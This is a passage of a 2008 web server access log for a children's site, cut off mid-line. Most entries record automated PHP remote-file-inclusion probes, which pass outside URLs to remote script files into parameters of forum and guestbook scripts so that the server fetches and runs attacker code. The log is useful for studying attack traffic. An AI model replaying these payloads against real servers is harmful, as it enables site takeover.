61.152.144.67 - - [20/Nov/2008:04:06:12 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "-"
118.219.254.105 - - [20/Nov/2008:04:10:13 -0700] "GET /logs/access_log//skin/zero_vote/error.php?dir=http://www.juto.com/ur/img/id.jpg??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.65" "-"
118.219.254.105 - - [20/Nov/2008:04:10:13 -0700] "GET //skin/zero_vote/error.php?dir=http://www.juto.com/ur/img/id.jpg??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.65" "-"
118.219.254.105 - - [20/Nov/2008:04:10:13 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.juto.com/ur/img/id.jpg??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.65" "-"
72.30.142.181 - - [20/Nov/2008:04:10:14 -0700] "GET /oldcalendars/calendarjune06.htm HTTP/1.0" 200 102078 www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
70.38.54.118 - - [20/Nov/2008:04:10:25 -0700] "GET /logs/access_log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gugakedu.co.kr/kboard//v6.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.814" "-"
70.38.54.118 - - [20/Nov/2008:04:10:25 -0700] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gugakedu.co.kr/kboard//v6.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.814" "-"
70.38.54.118 - - [20/Nov/2008:04:10:25 -0700] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gugakedu.co.kr/kboard//v6.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.814" "-"
70.85.149.242 - - [20/Nov/2008:04:11:15 -0700] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gugakedu.co.kr/kboard//test.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "-"
70.85.149.242 - - [20/Nov/2008:04:11:16 -0700] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gugakedu.co.kr/kboard//test.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "-"
118.219.254.105 - - [20/Nov/2008:04:11:26 -0700] "GET /logs/access_log//skin/zero_vote/error.php?dir=http://www.juto.com/ur/img/id.jpg??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.65" "-"
118.219.254.105 - - [20/Nov/2008:04:11:26 -0700] "GET //skin/zero_vote/error.php?dir=http://www.juto.com/ur/img/id.jpg??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.65" "-"
118.219.254.105 - - [20/Nov/2008:04:11:26 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.juto.com/ur/img/id.jpg??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.65" "-"
222.233.52.18 - - [20/Nov/2008:04:11:48 -0700] "GET /logs/access_log.old//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gugakedu.co.kr/kboard//v6.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
222.233.52.18 - - [20/Nov/2008:04:11:48 -0700] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gugakedu.co.kr/kboard//v6.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
222.233.52.18 - - [20/Nov/2008:04:11:49 -0700] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gugakedu.co.kr/kboard//v6.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
222.236.47.182 - - [20/Nov/2008:04:11:49 -0700] "GET /logs/access_log.old//?_zb_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.236.47.182 - - [20/Nov/2008:04:11:49 -0700] "GET /logs//?_zb_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 200 971 www.wnckids.com "-" "Mozilla/5.0" "-"
222.236.47.182 - - [20/Nov/2008:04:11:49 -0700] "GET //?_zb_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 200 1047 www.wnckids.com "-" "Mozilla/5.0" "-"
118.219.254.105 - - [20/Nov/2008:04:11:59 -0700] "GET /logs/error_log.old//skin/zero_vote/error.php?dir=http://www.juto.com/ur/img/id.jpg??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.65" "-"
222.236.47.182 - - [20/Nov/2008:04:12:43 -0700] "GET /logs/access_log.old//?_zb_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
222.236.47.182 - - [20/Nov/2008:04:12:43 -0700] "GET //?_zb_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 200 1047 www.wnckids.com "-" "Mozilla/5.0" "-"
222.236.47.182 - - [20/Nov/2008:04:12:43 -0700] "GET /logs//?_zb_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 200 971 www.wnckids.com "-" "Mozilla/5.0" "-"
70.38.54.118 - - [20/Nov/2008:04:12:46 -0700] "GET /logs/error_log.old//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gugakedu.co.kr/kboard//v6.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.814" "-"
118.219.254.105 - - [20/Nov/2008:04:12:52 -0700] "GET /logs/error_log.old//